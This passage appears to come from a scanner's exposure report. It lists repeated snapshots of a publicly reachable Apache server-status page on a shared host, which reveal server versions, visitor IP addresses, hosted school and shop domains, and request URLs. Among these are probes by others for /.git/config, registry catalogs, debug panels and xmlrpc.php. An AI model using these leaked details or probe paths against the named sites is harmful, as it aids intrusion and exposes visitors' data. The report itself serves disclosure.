      1.6 requests/sec - 236.2 kB/second - 147.2 kB/request - 1059.27 ms/request
      15 requests currently being processed, 0 workers gracefully restarting, 235 idle workers
      ____________________________K____________K_______W__K_____K_____
      _________________________________K_________R_________________WWW
      WWWWWWWWWWWWWWWWWWWWWW________________R______K__________________
      _______W______KK__________________________________________......
      ............................................_K_________K____R___
      _____...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      <SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-5240290/126/3856_
      9.2742530080170.05.51586.75
      217.113.194.243http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1415&t=217.113.194.80&c=5 HTT
      
      0-5240290/61/3251_
      9.0727916815663440.03.48435.76
      188.50.126.66http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-5240290/117/3613_
      9.13196515695280.028.73471.96
      217.113.194.251http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1564&t=217.113.194.113&c=5 HT
      
      0-5240290/64/3461_
      9.251310347465980.03.27414.35
      217.113.194.251http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=3&q=621&t=217.113.194.121&c=5 HT
      
      0-5240290/61/3556_
      9.11244526244220.011.14565.59
      217.113.194.253http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1540&t=217.113.194.246&c=5 HT
      
      0-5240290/72/3347_
      9.29214627195910.03.00423.56
      66.228.42.188http/1.13dvi.com:443GET / HTTP/1.0
      
      0-5240290/96/3558_
      9.10270325091310.057.78483.95
      51.252.212.77http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/aJLsdNH0RF9Ql1OrcBkQxc
      
      0-5240290/57/3343_
      9.11262423647120.017.41560.38
      154.54.249.208http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1747&t=217.113.194.253&c=5 HT
      
      0-5240290/61/3893_
      9.171552433229668850.09.35607.81
      185.71.134.117http/1.1albayan.edu.sa:443GET /imgweb/book/mawsoaejaz.pdf HTTP/1.1
      
      0-5240290/50/3532_
      9.251421024951160.02.38456.13
      34.245.192.65http/1.13dvi.com:443GET /v/sibaqulhorof/ HTTP/1.1
      
      0-5240290/52/3068_
      9.2758113223056730.02.50438.46
      162.158.79.8http/1.1support.daaris.com:443GET /submitticket.php?language=estonian HTTP/1.1
      
      0-5240290/103/3878_
      9.24138220986720.03.05355.27
      82.167.151.244http/1.1albayan.edu.sa:443GET /e_sch/images/complaints_and_suggestions.png HTTP/1.1
      
      0-5240290/70/3544_
      9.0522030550770.03.66741.36
      5.163.74.86http/1.1
      
      0-5240290/74/3534_
      9.09271522384180.06.12607.10
      51.252.212.77http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      0-5240290/75/3661_
      9.2687133392660.04.72453.77
      95.108.213.104http/1.1albayan.edu.sa:443GET /robots.txt HTTP/1.1
      
      0-5240290/74/3337_
      9.25108016480130.02.29544.41
      217.113.194.248http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=3&q=620&t=217.113.194.130&c=5 HT
      
      0-5240290/89/3245_
      9.11222420110390.03.56600.86
      217.113.194.251http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1710&t=217.113.194.251&c=5 HT
      
      0-5240290/42/3421_
      9.25119021277710.02.11496.41
      217.113.194.246http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=3&q=620&t=217.113.194.161&c=5 HT
      
      0-5240290/51/3665_
      9.23150218456770.020.65534.70
      51.252.173.181http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-5240290/41/3448_
      8.98116127357140.01.10424.34
      168.149.85.14http/1.1
      
      0-5240290/43/3410_
      9.15164025832460.05.96435.83
      52.167.144.225http/1.1albayan.edu.sa:80GET /albayan_library/Categorys2.php?sec=4 HTTP/1.1
      
      0-5240290/53/3458_
      9.300017320280.01.40463.76
      178.86.110.198http/1.1albayan.edu.sa:80GET /web/images/name_school.png HTTP/1.1
      
      0-5240290/80/3478_
      9.3125024619340.02.36494.70
      193.186.4.60http/1.1jawad.com.sa:443GET /en HTTP/1.1
      
      0-5240290/55/3580_
      9.25123417996330.029.53461.68
      217.113.194.253http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1693&t=217.113.194.160&c=5 HT
      
      0-5240290/59/3672_
      9.2724020032450.035.52645.02
      217.113.194.250http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=3&q=606&t=217.113.194.117&c=5 HT
      
      1-5277640/27/3105_
      5.8522437562460.06.68586.64
      178.80.27.196http/1.1
      
      1-5277640/74/3391_
      5.9718226130313040.03.23469.72
      168.149.85.14http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A8%D9%86%D9%83%20%D8%A7%D8%B3%D8%A6%D9%84%
      
      1-5277640/79/3612_
      5.97179024352440.01.21552.39
      217.113.194.251http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=3&q=608&t=217.113.194.175&c=5 HT
      
      1-5277646/28/3332K
      6.13122380071250.81.19522.57
      178.86.110.198http/1.1albayan.edu.sa:443GET /web/images/001_43.png HTTP/1.1
      
      1-5277640/35/3311_
      6.0783525436260.02.60465.43
      172.70.243.234http/1.1qr.brunch.ws:443GET /assets/fonts/rb.ttf HTTP/1.1
      
      1-5277640/39/3173_
      6.01141216352120.01.54422.74
      93.112.175.54http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      1-5277640/80/3310_
      5.90272228090870.013.25471.16
      51.252.212.77http/1.1jawad.com.sa:443
      Found on 2024-05-28 13:49
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140ea75d334

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 28-May-2024 13:49:42 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  5 days 9 hours 44 minutes 52 seconds
      Server load: 0.09 0.28 0.36
      Total accesses: 748938 - Total Traffic: 105.1 GB - Total Duration: 796402620
      CPU Usage: u392.44 s40.23 cu3126.37 cs689.61 - .91% CPU load
      1.6 requests/sec - 235.8 kB/second - 147.1 kB/request - 1063.38 ms/request
      38 requests currently being processed, 0 workers gracefully restarting, 212 idle workers
      ___________R__________W__________________K______________________
      _________K__________________R________________________K_______WWW
      WWWWWWWWWWWWWWWWWWWWWW______K__KK________________K________K_____
      _____________________K____________________K_______________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-5121020/275/3708_
      24.52148529770740.028.38580.20
      34.77.126.178http/1.13dvi.com:443GET / HTTP/1.0
      
      0-5121020/144/3170_
      24.02329215558420.07.60429.81
      51.211.37.55http/1.1
      
      0-5121020/231/3470_
      24.04291614994620.07.98438.82
      148.66.147.218http/1.1
      
      0-5121020/212/3379_
      24.432602347334130.037.74409.70
      2.90.90.139http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-5121020/202/3473_
      24.39306226184530.012.91553.27
      31.167.168.136http/1.1albayan.edu.sa:443GET /e_sch/images/complaints_and_suggestions.png HTTP/1.1
      
      0-5121020/192/3256_
      24.51223727117090.015.01417.52
      172.69.103.145http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-5121020/182/3447_
      24.471155224908850.010.53425.57
      199.45.155.54http/1.13dvi.com:443GET / HTTP/1.1
      
      0-5121020/149/3268_
      24.08146123521620.011.57542.69
      51.252.149.195http/1.1
      
      0-5121020/166/3818_
      24.44205029140950.011.42597.76
      54.36.148.90http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=648&t=54.36.150.125&c=5 HTTP/
      
      0-5121020/220/3463_
      24.3930014124885570.013.18452.59
      148.72.246.14http/1.1trydaris.com:80POST /xmlrpc.php HTTP/1.1
      
      0-5121020/200/2995_
      24.461582222096580.07.40434.49
      95.185.42.111http/1.1albayan.edu.sa:443GET /e_sch/images/menu_school.jpg HTTP/1.1
      
      0-5121020/180/3747R
      24.353663920878250.05.83350.50
      175.110.9.181http/1.1
      
      0-5121020/144/3448_
      24.37354028859750.054.32735.66
      51.211.37.55http/1.1albayan.edu.sa:80GET /web/118.html2 HTTP/1.1
      
      0-5121020/236/3437_
      24.3834543322025950.014.73599.45
      82.167.154.233http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/__________%20_________
      
      0-5121020/205/3565_
      24.2167532768290.010.81448.12
      5.109.57.112http/1.1
      
      0-5121020/179/3223_
      24.4887816050030.010.80538.53
      95.187.16.195http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-5121020/162/3130_
      24.5034119781020.017.89596.33
      145.82.134.198http/1.1albayan.edu.sa:443GET /web/images/logo_school.png HTTP/1.1
      
      0-5121020/200/3359_
      24.461517221226210.017.22493.65
      95.185.42.111http/1.1albayan.edu.sa:443GET /web/468.html2 HTTP/1.1
      
      0-5121020/259/3598_
      24.4977218243910.020.45511.82
      5.82.79.245http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/spinner.gif HTTP/1
      
      0-5121020/200/3386_
      24.3928411227284880.018.98422.07
      92.204.220.68http/1.1trydaris.com:80POST /xmlrpc.php HTTP/1.1
      
      0-5121020/164/3329_
      24.4027611525644490.06.44428.86
      198.11.175.79http/1.1trydaris.com:80POST /xmlrpc.php HTTP/1.1
      
      0-5121020/183/3391_
      24.03297117266800.010.29461.35
      118.25.27.91http/1.1
      
      0-5121020/167/3382W
      24.360022727140.05.70489.76
      172.71.182.220http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-5121020/226/3509_
      24.4963017025700.06.16431.44
      5.109.57.112http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      0-5121020/191/3601_
      24.4226311219207530.07.69606.61
      35.220.243.24http/1.1trydaris.com:80POST /xmlrpc.php HTTP/1.1
      
      1-5121320/156/3063_
      26.9926310436593030.031.86579.25
      2.90.90.139http/1.1albayan.edu.sa:443GET /e_sch/images/Background.jpg HTTP/1.1
      
      1-5121320/184/3298_
      26.36146030287690.011.89465.84
      95.185.42.111http/1.1
      
      1-5121320/262/3515_
      27.00235124319410.030.32549.74
      66.118.174.113http/1.1albayan.edu.sa:443GET /apple-touch-icon-precomposed.png HTTP/1.1
      
      1-5121320/146/3280_
      27.00260223754560.099.07519.68
      2.90.90.139http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      1-5121320/213/3262_
      26.93294225312470.031.83461.78
      176.16.38.168http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font1/DroidKufi-Bold.woff HTTP/1.1
      
      1-5121320/223/3110_
      26.942914852816317970.088.62420.11
      51.252.232.41http/1.1sulaimaniya.edu.sa:443GET /download/52/%D9%81%D9%8A%D8%B2%D9%8A%D8%A7%D8%A1/1903/%D8%
      
      1-5121320/188/3217_
      26.26281225631080.018.27456.75
      51.235.104.222http/1.1
      
      1-5121320/210/3303_
      27.011828725717190.011.02455.88
      52.167.144.217http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1692&page=1 HTTP/1.1
      
      1-5121320/178/3102_
      26.5064532770430.015.76480.94
      5.109.57.112h
      Found on 2024-05-28 10:49
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831404604de0e

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 28-May-2024 00:11:17 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 5
      Parent Server MPM Generation: 4
      Server uptime:  4 days 20 hours 6 minutes 27 seconds
      Server load: 0.50 0.53 0.46
      Total accesses: 680882 - Total Traffic: 97.0 GB - Total Duration: 736924977
      CPU Usage: u641.33 s98.15 cu2533.76 cs556.61 - .916% CPU load
      1.63 requests/sec - 243.3 kB/second - 149.3 kB/request - 1082.31 ms/request
      13 requests currently being processed, 0 workers gracefully restarting, 237 idle workers
      ________R_K_____________________________________________________
      K_____________K____________________________________K____________
      ______________W_____K_______K___________________K__________R____
      _________________W_____K__________________K_______________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-4221720/574/3233_
      73.583912029250070.0163.10540.64
      199.45.155.29http/1.1
      
      0-4221720/578/2860_
      73.75248115027280.037.42407.89
      172.105.16.34http/1.1akgsa.com:443GET /about HTTP/1.1
      
      0-4221720/672/3101_
      73.66356213515110.0109.70424.25
      51.39.226.49http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/video.png HTTP/1.1
      
      0-4221720/575/3030_
      73.583012765297343928130.075.84354.96
      208.109.174.117http/1.1
      
      0-4221720/561/3122_
      73.90116227424392980.0141.40489.28
      175.110.169.80http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A8%D9%86%D9%83%20%D8%A7%D9%84%D8%A3%D8%B3%
      
      0-4221720/646/2946_
      73.9077026610630.033.31398.00
      94.48.123.187http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      0-4221720/631/3111_
      73.712764323856080.095.05405.02
      66.249.70.5http/1.1jawad.com.sa:443GET / HTTP/1.1
      
      0-4221720/643/2948_
      73.02252214320190900.0124.20493.00
      172.105.16.34http/1.1
      
      0-4221720/609/3535R
      73.56478228467820.049.58583.48
      94.48.123.187http/1.1
      
      0-4221720/643/3106_
      73.74262417758800.039.43433.27
      51.39.243.184http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/aJLsdNH0RF9Ql1OrcBkQxc
      
      0-4221721/524/2700K
      73.9110221692640.826.99394.82
      172.69.214.54http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-4221720/561/3407_
      73.91496819578380.068.79315.42
      208.109.174.117http/1.1sulaimaniya.edu.sa:80POST /xmlrpc.php HTTP/1.1
      
      0-4221720/626/3160_
      73.61361125491080.0147.83645.81
      95.177.180.85http/1.1albayan.edu.sa:443GET /images/image3.jpg HTTP/1.1
      
      0-4221720/595/3086_
      73.87132319680970.0202.21580.60
      2.90.200.249http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/1D92GOCkUUxk9KBgmE7pG7
      
      0-4221720/601/3239_
      73.84140126426320.0128.27423.20
      51.39.229.240http/1.1jawad.com.sa:443GET /public/front_resources/js/owl.carousel.min.js HTTP/1.1
      
      0-4221720/592/2932_
      73.871379012506210.064.68511.80
      2.90.200.249http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      0-4221720/505/2852_
      73.781731913037850.054.06496.14
      85.208.96.211http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=93 HTTP/1.1
      
      0-4221720/524/3024_
      73.371566220161640.063.68453.00
      2.90.76.221http/1.1
      
      0-4221720/554/3219_
      73.71284317278950.070.09419.69
      156.197.72.43http/1.1zed.sa:443GET /wp-content/plugins/woocommerce/assets/js/frontend/price-sl
      
      0-4221720/519/3039_
      73.83143226433490.0126.73375.33
      175.110.169.80http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-4221720/610/3048_
      73.772182124742820.091.01405.50
      66.249.70.6http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=0 HTTP/1.1
      
      0-4221720/647/3072_
      73.915610017046790.058.94424.45
      216.250.106.188http/1.1sulaimaniya.edu.sa:80POST /xmlrpc.php HTTP/1.1
      
      0-4221720/595/3018_
      73.7525967220552490.039.67474.83
      156.197.72.43http/1.1zed.sa:443GET /robots.txt HTTP/1.1
      
      0-4221720/622/3144_
      73.69298215021520.045.02401.00
      156.197.72.43http/1.1zed.sa:443GET /wp-content/uploads/2020/03/smoke-salmon-salad-150x150.jpg 
      
      0-4221720/481/3252_
      73.67350105318568260.089.05565.62
      5.108.233.172http/1.1albayan.edu.sa:443GET /images/albayan-new.jpg HTTP/1.1
      
      1-4222000/511/2790_
      70.202672135380970.072.79542.72
      66.249.70.6http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      1-4222000/619/2988_
      70.301302729965210.030.01441.85
      2.90.200.249http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      1-4222000/614/3037_
      70.29143220269700.0107.90496.31
      175.110.169.80http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-4222000/646/2870_
      70.35426420445070.057.04399.80
      51.77.195.59http/1.1sulaimaniya.edu.sa:80POST /xmlrpc.php HTTP/1.1
      
      1-4222000/432/2900_
      70.103752015050530.087.77404.49
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      1-4222000/600/2744_
      70.14348314056640.041.07325.68
      5.108.233.172http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/video.png HTTP/1.1
      
      1-4222000/678/2869_
      70.32129417292670.084.80401.70
      216.244.66.198http/1.1albayan.edu.sa:443GET /e_sch/code/forum/db.php?j=3&q=214&t=216.244.66.198&c=5 HTT
      
      1-4222000/556/2877_
      70.361217377700.059.67432.51
      172.70.80.48
      Found on 2024-05-27 21:11
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140ce5244aa

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Monday, 27-May-2024 14:52:24 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 5
      Parent Server MPM Generation: 4
      Server uptime:  4 days 10 hours 47 minutes 34 seconds
      Server load: 0.60 0.60 0.50
      Total accesses: 616236 - Total Traffic: 87.2 GB - Total Duration: 655063863
      CPU Usage: u472.77 s59.13 cu2437.04 cs538.53 - .912% CPU load
      1.6 requests/sec - 237.9 kB/second - 148.4 kB/request - 1063.01 ms/request
      10 requests currently being processed, 0 workers gracefully restarting, 240 idle workers
      ______________K____R________________________________________K___
      ___________________K_______________R___________________________K
      ___________________________________________W___________________K
      _________________________K_______________________K________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-4221720/296/2955_
      41.7474028308190.071.46449.00
      66.249.88.129http/1.1zed.sa:80GET /wp-content/plugins/revslider/public/assets/js/extensions/r
      
      0-4221720/308/2590_
      41.5324335214599500.023.41393.88
      188.49.163.183http/1.1albayan.edu.sa:443GET /imgweb/1445/5th%20Writing-Compre%20T3%20QB-%20(2023-2024)%
      
      0-4221720/406/2835_
      41.737621112404320.023.35337.89
      66.249.88.131http/1.1zed.sa:80GET /wp-content/plugins/mpc-massive/assets/js/mpc-vendor.min.js
      
      0-4221720/394/2849_
      41.50358488217830.064.09343.20
      172.71.114.50http/1.1qr.brunch.ws:443GET /storage/food_image/17096789003777_struwberry.webp HTTP/1.1
      
      0-4221720/332/2893_
      41.7574221802170.046.99394.87
      66.249.88.130http/1.1zed.sa:443GET /wp-content/uploads/2020/03/smoke-salmon-salad-150x150.jpg 
      
      0-4221720/322/2622_
      41.7674224523380.019.94384.62
      66.249.88.131http/1.1zed.sa:443GET /wp-content/uploads/2020/03/zed-burger-1-150x150.jpg HTTP/1
      
      0-4221720/363/2843_
      41.51358122540310.080.46390.43
      172.71.115.66http/1.1qr.brunch.ws:443GET /storage/food_image/17162866023190_almondcoffeethermos.jpg 
      
      0-4221720/306/2611_
      41.53287017658670.098.60467.40
      52.167.144.238http/1.1albayan.edu.sa:80GET /web/326.html2 HTTP/1.1
      
      0-4221720/352/3278_
      41.58224228074810.015.99549.89
      31.167.155.134http/1.1zed.sa:443GET /wp-content/uploads/2020/03/pic4.jpg HTTP/1.1
      
      0-4221720/369/2832_
      41.59186017295840.024.22418.06
      54.36.149.42http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=914&t=54.36.149.69&c=5 HTTP/1
      
      0-4221720/287/2463_
      41.513583215687460.013.24381.07
      172.71.115.24http/1.1qr.brunch.ws:443GET /storage/food_image/17162864494425_frenchlatteaulatte.jpg H
      
      0-4221720/313/3159_
      41.65146219316680.052.67299.31
      188.54.234.247http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      0-4221720/308/2842_
      41.765514622472220.044.12542.09
      165.22.34.189http/1.1trynidaa.com:443GET / HTTP/1.1
      
      0-4221720/305/2796_
      41.6417814218379750.041.08419.47
      a36d657dc7.scan.leakix.orghttp/1.1randalift.com.sa:80GET /server-status HTTP/1.1
      
      0-4221721/330/2968K
      41.770125887410.823.70318.63
      172.70.230.35http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-4221720/239/2579_
      41.64176011497560.017.09464.21
      165.22.34.189http/1.1randalift.com.sa:80GET /telescope/requests HTTP/1.1
      
      0-4221720/280/2627_
      41.728221310214200.011.91453.99
      66.249.88.195http/1.1zed.brunch.ws:443GET /storage/media/image/del3.png HTTP/1.1
      
      0-4221720/265/2765_
      41.5821894119631500.053.09442.40
      34.121.138.195http/1.1zed.sa:80GET / HTTP/1.1
      
      0-4221720/356/3021_
      41.4657115279120.059.90409.50
      165.22.34.189http/1.1
      
      0-4221720/288/2808R
      41.48358323044930.038.88287.47
      93.169.30.143http/1.1
      
      0-4221720/354/2792_
      41.30239322402080.071.50385.99
      93.169.30.143http/1.1
      
      0-4221720/362/2787_
      41.77507114111650.022.24387.74
      165.22.34.189http/1.1trynidaa.com:443GET /login.action HTTP/1.1
      
      0-4221720/319/2742_
      41.59213216499360.021.54456.71
      41.221.187.218http/1.1zed.sa:443GET /wp-content/uploads/2020/03/mozzarella-ciabiata-550x550.jpg
      
      0-4221720/291/2813_
      41.71135365012585820.024.15380.12
      5.109.75.192http/1.1zed.sa:443GET /wp-content/uploads/2020/03/home1-img-54.jpg HTTP/1.1
      
      0-4221720/305/3076_
      41.52358418358190.074.93551.50
      172.71.114.144http/1.1qr.brunch.ws:443GET /storage/food_image/17162871303626_novawaterlarge.jpg HTTP/
      
      1-4222000/324/2603_
      39.09216193229968920.020.09490.02
      129.208.101.204http/1.1albayan.edu.sa:443GET /imgweb/file44/%D8%B4%D9%87%D8%A7%D8%AF%D8%A9%20%D8%B4%D9%8
      
      1-4222000/364/2733_
      39.29534129654230.020.12431.96
      165.22.34.189http/1.1trynidaa.com:443GET /v2/_catalog HTTP/1.1
      
      1-4222000/332/2755_
      39.2474217303510.069.79458.20
      66.249.88.130http/1.1zed.sa:443GET /wp-content/uploads/2020/03/spinach-salad-150x150.jpg HTTP/
      
      1-4222000/290/2514_
      39.13177118048320.036.31379.07
      165.22.34.189http/1.1randalift.com.sa:80GET /.git/config HTTP/1.1
      
      1-4222000/220/2688_
      39.13155014239060.041.76358.48
      51.252.131.246http/1.1albayan.edu.sa:80GET /web.html HTTP/1.1
      
      1-4222000/307/2451_
      39.13215113691860.029.14313.75
      41.221.187.218http/1.1zed.sa:80GET /wp-content/plugins/revslider/public/assets/js/extensions/r
      
      1-4222000/364/2555_
      39.20922013525350.050.48367.37
      85.208.96.207http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=480 HTTP/1.1
      
      1-4222000/248/2
      Found on 2024-05-27 11:52
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a8314057311d2b

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
